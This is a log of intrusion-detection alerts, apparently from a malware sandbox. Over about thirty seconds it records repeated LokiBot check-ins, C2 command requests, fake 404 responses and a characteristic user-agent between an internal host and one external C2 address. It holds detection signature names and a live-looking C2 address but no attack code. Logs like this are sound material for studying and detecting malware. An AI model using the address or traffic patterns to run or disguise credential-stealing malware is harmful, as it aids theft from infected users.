2024-09-25T10:20:33.843258+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49798	188.114.97.3	80	TCP
2024-09-25T10:20:33.848087+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49798	TCP
2024-09-25T10:20:34.004751+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49799	188.114.97.3	80	TCP
2024-09-25T10:20:34.004751+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49799	188.114.97.3	80	TCP
2024-09-25T10:20:34.004751+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49799	188.114.97.3	80	TCP
2024-09-25T10:20:34.678916+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49799	188.114.97.3	80	TCP
2024-09-25T10:20:34.678916+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49799	188.114.97.3	80	TCP
2024-09-25T10:20:34.683975+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49799	TCP
2024-09-25T10:20:34.831696+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49800	188.114.97.3	80	TCP
2024-09-25T10:20:34.831696+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49800	188.114.97.3	80	TCP
2024-09-25T10:20:34.831696+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49800	188.114.97.3	80	TCP
2024-09-25T10:20:35.509847+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49800	188.114.97.3	80	TCP
2024-09-25T10:20:35.509847+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49800	188.114.97.3	80	TCP
2024-09-25T10:20:35.514687+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49800	TCP
2024-09-25T10:20:35.676731+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49801	188.114.97.3	80	TCP
2024-09-25T10:20:35.676731+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49801	188.114.97.3	80	TCP
2024-09-25T10:20:35.676731+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49801	188.114.97.3	80	TCP
2024-09-25T10:20:36.333409+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49801	188.114.97.3	80	TCP
2024-09-25T10:20:36.333409+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49801	188.114.97.3	80	TCP
2024-09-25T10:20:36.338191+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49801	TCP
2024-09-25T10:20:36.488105+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49802	188.114.97.3	80	TCP
2024-09-25T10:20:36.488105+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49802	188.114.97.3	80	TCP
2024-09-25T10:20:36.488105+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49802	188.114.97.3	80	TCP
2024-09-25T10:20:37.192021+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49802	188.114.97.3	80	TCP
2024-09-25T10:20:37.192021+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49802	188.114.97.3	80	TCP
2024-09-25T10:20:37.196799+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49802	TCP
2024-09-25T10:20:37.347438+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49803	188.114.97.3	80	TCP
2024-09-25T10:20:37.347438+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49803	188.114.97.3	80	TCP
2024-09-25T10:20:37.347438+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49803	188.114.97.3	80	TCP
2024-09-25T10:20:38.012160+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49803	188.114.97.3	80	TCP
2024-09-25T10:20:38.012160+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49803	188.114.97.3	80	TCP
2024-09-25T10:20:38.018123+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49803	TCP
2024-09-25T10:20:38.170705+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49804	188.114.97.3	80	TCP
2024-09-25T10:20:38.170705+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49804	188.114.97.3	80	TCP
2024-09-25T10:20:38.170705+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49804	188.114.97.3	80	TCP
2024-09-25T10:20:38.830735+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49804	188.114.97.3	80	TCP
2024-09-25T10:20:38.830735+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49804	188.114.97.3	80	TCP
2024-09-25T10:20:38.835742+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49804	TCP
2024-09-25T10:20:38.983344+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49805	188.114.97.3	80	TCP
2024-09-25T10:20:38.983344+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49805	188.114.97.3	80	TCP
2024-09-25T10:20:38.983344+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49805	188.114.97.3	80	TCP
2024-09-25T10:20:39.656614+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49805	188.114.97.3	80	TCP
2024-09-25T10:20:39.656614+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49805	188.114.97.3	80	TCP
2024-09-25T10:20:39.661421+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49805	TCP
2024-09-25T10:20:39.812510+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49806	188.114.97.3	80	TCP
2024-09-25T10:20:39.812510+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49806	188.114.97.3	80	TCP
2024-09-25T10:20:39.812510+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49806	188.114.97.3	80	TCP
2024-09-25T10:20:40.523719+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49806	188.114.97.3	80	TCP
2024-09-25T10:20:40.523719+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49806	188.114.97.3	80	TCP
2024-09-25T10:20:40.528482+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49806	TCP
2024-09-25T10:20:40.679656+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49807	188.114.97.3	80	TCP
2024-09-25T10:20:40.679656+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49807	188.114.97.3	80	TCP
2024-09-25T10:20:40.679656+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49807	188.114.97.3	80	TCP
2024-09-25T10:20:41.372812+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49807	188.114.97.3	80	TCP
2024-09-25T10:20:41.372812+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49807	188.114.97.3	80	TCP
2024-09-25T10:20:41.378361+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49807	TCP
2024-09-25T10:20:41.532089+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49808	188.114.97.3	80	TCP
2024-09-25T10:20:41.532089+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49808	188.114.97.3	80	TCP
2024-09-25T10:20:41.532089+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49808	188.114.97.3	80	TCP
2024-09-25T10:20:42.248861+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49808	188.114.97.3	80	TCP
2024-09-25T10:20:42.248861+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49808	188.114.97.3	80	TCP
2024-09-25T10:20:42.253717+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49808	TCP
2024-09-25T10:20:42.407099+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49809	188.114.97.3	80	TCP
2024-09-25T10:20:42.407099+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49809	188.114.97.3	80	TCP
2024-09-25T10:20:42.407099+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49809	188.114.97.3	80	TCP
2024-09-25T10:20:43.045056+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49809	188.114.97.3	80	TCP
2024-09-25T10:20:43.045056+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49809	188.114.97.3	80	TCP
2024-09-25T10:20:43.050099+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49809	TCP
2024-09-25T10:20:43.201046+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49810	188.114.97.3	80	TCP
2024-09-25T10:20:43.201046+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49810	188.114.97.3	80	TCP
2024-09-25T10:20:43.201046+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49810	188.114.97.3	80	TCP
2024-09-25T10:20:43.854654+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49810	188.114.97.3	80	TCP
2024-09-25T10:20:43.854654+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49810	188.114.97.3	80	TCP
2024-09-25T10:20:43.859419+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49810	TCP
2024-09-25T10:20:44.020697+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49811	188.114.97.3	80	TCP
2024-09-25T10:20:44.020697+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49811	188.114.97.3	80	TCP
2024-09-25T10:20:44.020697+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49811	188.114.97.3	80	TCP
2024-09-25T10:20:44.684574+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49811	188.114.97.3	80	TCP
2024-09-25T10:20:44.684574+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49811	188.114.97.3	80	TCP
2024-09-25T10:20:44.689401+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49811	TCP
2024-09-25T10:20:44.843940+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49812	188.114.97.3	80	TCP
2024-09-25T10:20:44.843940+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49812	188.114.97.3	80	TCP
2024-09-25T10:20:44.843940+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49812	188.114.97.3	80	TCP
2024-09-25T10:20:45.503133+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49812	188.114.97.3	80	TCP
2024-09-25T10:20:45.503133+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49812	188.114.97.3	80	TCP
2024-09-25T10:20:45.510355+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49812	TCP
2024-09-25T10:20:45.767835+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49813	188.114.97.3	80	TCP
2024-09-25T10:20:45.767835+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49813	188.114.97.3	80	TCP
2024-09-25T10:20:45.767835+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49813	188.114.97.3	80	TCP
2024-09-25T10:20:46.424917+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49813	188.114.97.3	80	TCP
2024-09-25T10:20:46.424917+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49813	188.114.97.3	80	TCP
2024-09-25T10:20:46.432138+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49813	TCP
2024-09-25T10:20:46.581998+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49814	188.114.97.3	80	TCP
2024-09-25T10:20:46.581998+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49814	188.114.97.3	80	TCP
2024-09-25T10:20:46.581998+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49814	188.114.97.3	80	TCP
2024-09-25T10:20:47.222041+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49814	188.114.97.3	80	TCP
2024-09-25T10:20:47.222041+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49814	188.114.97.3	80	TCP
2024-09-25T10:20:47.227872+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49814	TCP
2024-09-25T10:20:47.383984+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49815	188.114.97.3	80	TCP
2024-09-25T10:20:47.383984+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49815	188.114.97.3	80	TCP
2024-09-25T10:20:47.383984+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49815	188.114.97.3	80	TCP
2024-09-25T10:20:48.049566+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49815	188.114.97.3	80	TCP
2024-09-25T10:20:48.049566+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49815	188.114.97.3	80	TCP
2024-09-25T10:20:48.054731+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49815	TCP
2024-09-25T10:20:48.345316+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49816	188.114.97.3	80	TCP
2024-09-25T10:20:48.345316+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49816	188.114.97.3	80	TCP
2024-09-25T10:20:48.345316+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49816	188.114.97.3	80	TCP
2024-09-25T10:20:49.020610+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49816	188.114.97.3	80	TCP
2024-09-25T10:20:49.020610+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49816	188.114.97.3	80	TCP
2024-09-25T10:20:49.025566+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49816	TCP
2024-09-25T10:20:49.177011+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49817	188.114.97.3	80	TCP
2024-09-25T10:20:49.177011+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49817	188.114.97.3	80	TCP
2024-09-25T10:20:49.177011+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49817	188.114.97.3	80	TCP
2024-09-25T10:20:50.103271+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49817	188.114.97.3	80	TCP
2024-09-25T10:20:50.103271+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49817	188.114.97.3	80	TCP
2024-09-25T10:20:50.108060+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49817	TCP
2024-09-25T10:20:50.264754+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49818	188.114.97.3	80	TCP
2024-09-25T10:20:50.264754+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49818	188.114.97.3	80	TCP
2024-09-25T10:20:50.264754+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49818	188.114.97.3	80	TCP
2024-09-25T10:20:50.944188+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49818	188.114.97.3	80	TCP
2024-09-25T10:20:50.944188+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49818	188.114.97.3	80	TCP
2024-09-25T10:20:50.954575+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49818	TCP
2024-09-25T10:20:51.117098+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49819	188.114.97.3	80	TCP
2024-09-25T10:20:51.117098+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49819	188.114.97.3	80	TCP
2024-09-25T10:20:51.117098+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49819	188.114.97.3	80	TCP
2024-09-25T10:20:51.808740+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49819	188.114.97.3	80	TCP
2024-09-25T10:20:51.808740+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49819	188.114.97.3	80	TCP
2024-09-25T10:20:51.813535+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49819	TCP
2024-09-25T10:20:51.965926+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49820	188.114.97.3	80	TCP
2024-09-25T10:20:51.965926+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49820	188.114.97.3	80	TCP
2024-09-25T10:20:51.965926+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49820	188.114.97.3	80	TCP
2024-09-25T10:20:52.620616+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49820	188.114.97.3	80	TCP
2024-09-25T10:20:52.620616+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49820	188.114.97.3	80	TCP
2024-09-25T10:20:52.625510+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49820	TCP
2024-09-25T10:20:52.847890+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49821	188.114.97.3	80	TCP
2024-09-25T10:20:52.847890+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49821	188.114.97.3	80	TCP
2024-09-25T10:20:52.847890+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49821	188.114.97.3	80	TCP
2024-09-25T10:20:53.479823+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49821	188.114.97.3	80	TCP
2024-09-25T10:20:53.479823+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49821	188.114.97.3	80	TCP
2024-09-25T10:20:53.484717+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49821	TCP
2024-09-25T10:20:53.648400+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49822	188.114.97.3	80	TCP
2024-09-25T10:20:53.648400+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49822	188.114.97.3	80	TCP
2024-09-25T10:20:53.648400+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49822	188.114.97.3	80	TCP
2024-09-25T10:20:54.312873+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49822	188.114.97.3	80	TCP
2024-09-25T10:20:54.312873+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49822	188.114.97.3	80	TCP
2024-09-25T10:20:54.318662+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49822	TCP
2024-09-25T10:20:54.469239+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49823	188.114.97.3	80	TCP
2024-09-25T10:20:54.469239+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49823	188.114.97.3	80	TCP
2024-09-25T10:20:54.469239+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49823	188.114.97.3	80	TCP
2024-09-25T10:20:55.121000+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49823	188.114.97.3	80	TCP
2024-09-25T10:20:55.121000+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49823	188.114.97.3	80	TCP
2024-09-25T10:20:55.126025+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49823	TCP
2024-09-25T10:20:55.277763+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49824	188.114.97.3	80	TCP
2024-09-25T10:20:55.277763+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49824	188.114.97.3	80	TCP
2024-09-25T10:20:55.277763+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49824	188.114.97.3	80	TCP
2024-09-25T10:20:55.938989+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49824	188.114.97.3	80	TCP
2024-09-25T10:20:55.938989+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49824	188.114.97.3	80	TCP
2024-09-25T10:20:55.943963+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49824	TCP
2024-09-25T10:20:56.095548+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49825	188.114.97.3	80	TCP
2024-09-25T10:20:56.095548+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49825	188.114.97.3	80	TCP
2024-09-25T10:20:56.095548+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49825	188.114.97.3	80	TCP
2024-09-25T10:20:56.779578+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49825	188.114.97.3	80	TCP
2024-09-25T10:20:56.779578+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49825	188.114.97.3	80	TCP
2024-09-25T10:20:56.785409+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49825	TCP
2024-09-25T10:20:56.943672+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49826	188.114.97.3	80	TCP
2024-09-25T10:20:56.943672+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49826	188.114.97.3	80	TCP
2024-09-25T10:20:56.943672+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49826	188.114.97.3	80	TCP
2024-09-25T10:20:57.616206+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49826	188.114.97.3	80	TCP
2024-09-25T10:20:57.616206+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49826	188.114.97.3	80	TCP
2024-09-25T10:20:57.621047+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49826	TCP
2024-09-25T10:20:57.765117+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49827	188.114.97.3	80	TCP
2024-09-25T10:20:57.765117+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49827	188.114.97.3	80	TCP
2024-09-25T10:20:57.765117+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49827	188.114.97.3	80	TCP
2024-09-25T10:20:58.434386+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49827	188.114.97.3	80	TCP
2024-09-25T10:20:58.434386+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49827	188.114.97.3	80	TCP
2024-09-25T10:20:58.439188+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49827	TCP
2024-09-25T10:20:58.604735+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49828	188.114.97.3	80	TCP
2024-09-25T10:20:58.604735+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49828	188.114.97.3	80	TCP
2024-09-25T10:20:58.604735+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49828	188.114.97.3	80	TCP
2024-09-25T10:20:59.260870+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49828	188.114.97.3	80	TCP
2024-09-25T10:20:59.260870+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49828	188.114.97.3	80	TCP
2024-09-25T10:20:59.265646+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49828	TCP
2024-09-25T10:21:00.485716+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49829	188.114.97.3	80	TCP
2024-09-25T10:21:00.485716+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49829	188.114.97.3	80	TCP
2024-09-25T10:21:00.485716+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49829	188.114.97.3	80	TCP
2024-09-25T10:21:00.485716+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49829	188.114.97.3	80	TCP
2024-09-25T10:21:00.485716+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49829	188.114.97.3	80	TCP
2024-09-25T10:21:00.492931+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49829	TCP
2024-09-25T10:21:00.652378+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49830	188.114.97.3	80	TCP
2024-09-25T10:21:00.652378+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49830	188.114.97.3	80	TCP
2024-09-25T10:21:00.652378+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49830	188.114.97.3	80	TCP
2024-09-25T10:21:01.352133+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49830	188.114.97.3	80	TCP
2024-09-25T10:21:01.352133+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49830	188.114.97.3	80	TCP
2024-09-25T10:21:01.357871+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49830	TCP
2024-09-25T10:21:01.509563+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49831	188.114.97.3	80	TCP
2024-09-25T10:21:01.509563+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49831	188.114.97.3	80	TCP
2024-09-25T10:21:01.509563+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49831	188.114.97.3	80	TCP
2024-09-25T10:21:02.141157+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.7	49831	188.114.97.3	80	TCP
2024-09-25T10:21:02.141157+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.7	49831	188.114.97.3	80	TCP
2024-09-25T10:21:02.145946+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.97.3	80	192.168.2.7	49831	TCP
2024-09-25T10:21:02.530015+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.7	49832	188.114.97.3	80	TCP
2024-09-25T10:21:02.530015+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.7	49832	188.114.97.3	80	TCP
2024-09-25T10:21:02.530015+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.7	49832	188.114.97.3	80	TCP
